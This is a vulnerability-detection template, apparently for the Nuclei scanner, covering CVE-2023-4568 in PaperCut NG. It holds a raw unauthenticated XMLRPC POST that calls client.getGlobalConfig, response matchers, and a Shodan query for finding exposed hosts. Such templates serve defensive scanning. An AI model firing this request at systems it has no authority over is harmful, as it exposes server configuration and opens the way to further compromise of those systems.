id: CVE-2023-4568

info:
  name: PaperCut NG Unauthenticated XMLRPC Functionality
  author: DhiyaneshDK
  severity: medium
  description: |
    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
    - https://www.tenable.com/security/research/tra-2023-31
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-4568
    cwe-id: CWE-287
    epss-score: 0.00254
    epss-percentile: 0.6331
    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: papercut
    product: papercut_ng
    shodan-query: html:"content="PaperCut""
  tags: cve,cve2023,unauth,papercut

http:
  - raw:
      - |
        POST /rpc/clients/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type:text/xml

        <?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'conf.ssl-port'
          - 'conf.auth-ttl-default'
        condition: and

      - type: word
        part: header
        words:
          - text/xml

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f4dc3f68618990c6dc1d25de4f55f14a37a02e9f12ae95008ec554a9d7d36164022100c785e8690aee2da778ead4ae40a7aa09bc50a366f62afb828e5af04dc3817cef:922c64590222798bb761d5b6d8e72950